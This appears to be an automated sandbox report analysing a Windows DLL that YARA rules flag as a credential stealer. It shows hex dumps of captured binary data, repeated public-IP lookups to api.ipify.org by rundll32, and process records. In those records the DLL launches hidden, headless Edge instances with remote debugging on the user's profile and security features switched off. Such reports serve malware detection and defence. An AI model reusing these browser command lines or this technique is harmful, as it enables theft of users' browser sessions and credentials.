                                                                                                                                                                                              Data Ascii: vHBHwADHH|L3H\$0Ht$8H _H\$0Ht$8H _H\$Ht$ HT$WATAUAVAWH YMDQMLHLqHA;}s@HcB0sB|tZ_A;|LcA;}(@HcB0sB|uZ_A;|
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: 48 89 7b 20 48 89 7b 28 48 89 7b 30 89 7b 18 e8 4f 25 01 00 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 54 41 56 41 57 48 83 ec 40 ff 41 18 48 8d 71 34 48 8b 01 4c 8d 71 30 48 8b d9 48 89 74 24 28 4c 8d 49 2c 4c 89 74 24 20 4c 8d 41 28 48 8b 40 18 48 8d 51 20 48 8b 49 10 48 8b 40 28 ff 15 c9 1c 16 00 8b f8 85 c0 74 53 48 8b 4b 10 4c 89 6c 24 70 45 33 ed 48 85 c9 74 15 48 8b 03 48 8b 50 18 48 8b 42 20 ff 15 a1 1c 16 00 4c 89 6b 10 48 8b 4b 08 e8 bc 24 01 00 83 ff 65 4c 89 6b 08 4c 89 6b 20 41 0f 44 fd 4c 89 6b 28 45 89 2e 8b c7 44 89 2e 44 89 6b 18 4c 8b 6c 24 70 48 8b 5c 24 78 48 8b ac 24 80 00 00 00 48 83 c4 40 41 5f 41 5e 41 5c 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89
                                                                                                                                                                                              Data Ascii: H{ H{(H{0{O%H\$03H _H\$Hl$VWATAVAWH@AHq4HLq0HHt$(LI,Lt$ LA(H@HQ HIH@(tSHKLl$pE3HtHHPHB LkHK$eLkLk ADLk(E.D.DkLl$pH\$xH$H@A_A^A\_^H\$Hl$H
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: 8b f1 44 8b e5 44 8b c5 89 6c 24 20 39 69 5c 74 0a b8 06 02 00 00 e9 bc 07 00 00 ff 41 48 0f 57 c0 48 89 9c 24 28 01 00 00 49 b9 ff ff ff ff ff ff ff 7f 48 89 bc 24 e8 00 00 00 48 8d 1d a8 d3 ff ff 4c 89 ac 24 e0 00 00 00 49 bd 00 00 00 00 00 00 00 80 0f 29 b4 24 d0 00 00 00 0f 29 bc 24 c0 00 00 00 44 0f 29 84 24 b0 00 00 00 44 0f 29 8c 24 a0 00 00 00 44 0f 29 94 24 90 00 00 00 f2 44 0f 10 15 32 5e 17 00 44 0f 29 9c 24 80 00 00 00 f2 44 0f 10 1d a0 5e 17 00 0f 11 44 24 40 0f 11 44 24 50 0f 11 44 24 60 83 fa 01 0f 8e 71 03 00 00 0f b6 46 25 8d 4a fc 3b c8 0f 4e c1 4c 63 f8 4c 89 7c 24 28 40 38 6e 26 0f 85 38 01 00 00 44 8b f5 85 c0 0f 8e 42 02 00 00 48 8b 7c 24 30 48 8b dd f2 44 0f 10 05 c6 5c 17 00 48 83 c7 20 f2 44 0f 10 0d a9 5c 17 00 0f 57 ff 48 8b 4f
                                                                                                                                                                                              Data Ascii: DDl$ 9i\tAHWH$(IH$HL$I)$)$D)$D)$D)$D2^D)$D^D$@D$PD$`qF%J;NLcL|$(@8n&8DBH|$0HD\H D\WHO
                                                                                                                                                                                              2025-01-14 12:13:37 UTC1369INData Raw: 24 28 45 33 c0 48 8d 54 24 40 48 8b ce e8 6f 76 02 00 44 8b e0 85 c0 0f 85 0a 02 00 00 8b 46 20 44 0f b6 46 27 83 e8 04 48 8b 5c 24 28 99 41 f7 f8 48 8b 53 18 0f b6 4a 02 44 0f b6 4a 03 c1 e1 08 44 03 c9 44 3b c8 0f 8d 46 01 00 00 48 8b 44 24 40 45 0f af c1 48 0f c8 41 8b c8 44 8b c5 48 03 ca 48 89 41 04 48 83 c1 0c 40 38 6e 25 76 2c 48 8d 54 24 48 0f 1f 40 00 0f 1f 84 00 00 00 00 00 8b 02 48 8d 49 04 0f c8 89 41 fc 48 8d 52 04 0f b6 46 25 41 ff c0 44 3b c0 7c e5 48 8b 4b 18 41 8d 51 01 8b c2 c1 e8 08 88 41 02 88 51 03 c7 43 14 01 00 00 00 4c 8d 44 24 40 48 8b d3 48 8b ce e8 fb 72 02 00 44 8b e0 85 c0 75 14 4c 8b 43 08 48 8b ce 48 8b 54 24 40 e8 a3 b5 0a 00 44 8b e0 83 6b 10 01 8b fd 0f 85 d4 00 00 00 ff 4e 5c 48 83 7b 08 01 75 07 c7 46 2c ff ff ff ff 48
                                                                                                                                                                                              Data Ascii: $(E3HT$@HovDF DF'H\$(AHSJDJDD;FHD$@EHADHHAH@8n%v,HT$H@HIAHRF%AD;|HKAQAQCLD$@HHrDuLCHHT$@DkN\H{uF,H


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449966172.67.74.1524437824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:13:40 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:13:40 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:40 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8a962fb20f39-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1572&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1669525&cwnd=249&unsent_bytes=0&cid=8eab208e4e7df3ab&ts=137&x=0"
                                                                                                                                                                                              2025-01-14 12:13:40 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.449970172.67.74.1524437824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:13:40 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:13:40 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:40 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8a99fc0ff799-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1585&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1784841&cwnd=141&unsent_bytes=0&cid=83ce860cefc051d1&ts=147&x=0"
                                                                                                                                                                                              2025-01-14 12:13:40 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.449978172.67.74.1524437824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:13:41 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:13:42 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:42 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8aa17a5643c1-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1609&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=1714621&cwnd=223&unsent_bytes=0&cid=f50a9bec62a4e7c9&ts=160&x=0"
                                                                                                                                                                                              2025-01-14 12:13:42 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.449983172.67.74.1524437824C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:13:42 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:13:42 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:13:42 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8aa54c086a5c-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1631&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1777236&cwnd=241&unsent_bytes=0&cid=d02d6bf5eda14ca3&ts=150&x=0"
                                                                                                                                                                                              2025-01-14 12:13:42 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.450069172.67.74.1524435812C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:14:35 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:14:35 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:14:35 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8bed8e379e02-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2524&min_rtt=2018&rtt_var=1770&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=677&delivery_rate=480895&cwnd=244&unsent_bytes=0&cid=5f48ef74a078907e&ts=183&x=0"
                                                                                                                                                                                              2025-01-14 12:14:35 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.450070172.67.74.1524435812C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:14:35 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:14:35 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:14:35 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8bf198250f97-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1540&rtt_var=587&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1850443&cwnd=245&unsent_bytes=0&cid=c30c95343c57bb75&ts=156&x=0"
                                                                                                                                                                                              2025-01-14 12:14:35 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.450072172.67.74.1524435812C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:14:36 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:14:36 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:14:36 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8bf89b324364-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1688&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1669525&cwnd=210&unsent_bytes=0&cid=c3db061d54469212&ts=156&x=0"
                                                                                                                                                                                              2025-01-14 12:14:36 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              8192.168.2.450073172.67.74.1524435812C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-14 12:14:37 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                              2025-01-14 12:14:37 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Tue, 14 Jan 2025 12:14:37 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 901d8bfc6a41439f-EWR
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2249&min_rtt=2185&rtt_var=865&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1336384&cwnd=241&unsent_bytes=0&cid=9c780f661bfbde05&ts=153&x=0"
                                                                                                                                                                                              2025-01-14 12:14:37 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                              Data Ascii: 8.46.123.189


                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:07:12:12
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\loaddll64.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:loaddll64.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll"
                                                                                                                                                                                              Imagebase:0x7ff64c720000
                                                                                                                                                                                              File size:165'888 bytes
                                                                                                                                                                                              MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                              Start time:07:12:12
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                              Start time:07:12:12
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
                                                                                                                                                                                              Imagebase:0x7ff622f20000
                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                              Start time:07:12:12
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers
                                                                                                                                                                                              Imagebase:0x7ff6d9fc0000
                                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                              Start time:07:12:12
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
                                                                                                                                                                                              Imagebase:0x7ff6d9fc0000
                                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:07:12:13
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                              Start time:07:12:13
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9991 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                              Start time:07:12:13
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1500,i,9890186816149597539,11445184587505823433,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                              Start time:07:12:13
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1484 --field-trial-handle=1428,i,15056660553952727470,9252583371032052914,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                              Start time:07:12:15
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeader
                                                                                                                                                                                              Imagebase:0x7ff6d9fc0000
                                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                              Start time:07:12:16
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7616 -s 412
                                                                                                                                                                                              Imagebase:0x7ff6a8de0000
                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                              Start time:07:12:18
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbers
                                                                                                                                                                                              Imagebase:0x7ff6d9fc0000
                                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                              Start time:07:12:18
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeader
                                                                                                                                                                                              Imagebase:0x7ff6d9fc0000
                                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                              Start time:07:12:18
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7832 -s 420
                                                                                                                                                                                              Imagebase:0x7ff6a8de0000
                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                              Start time:07:12:20
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
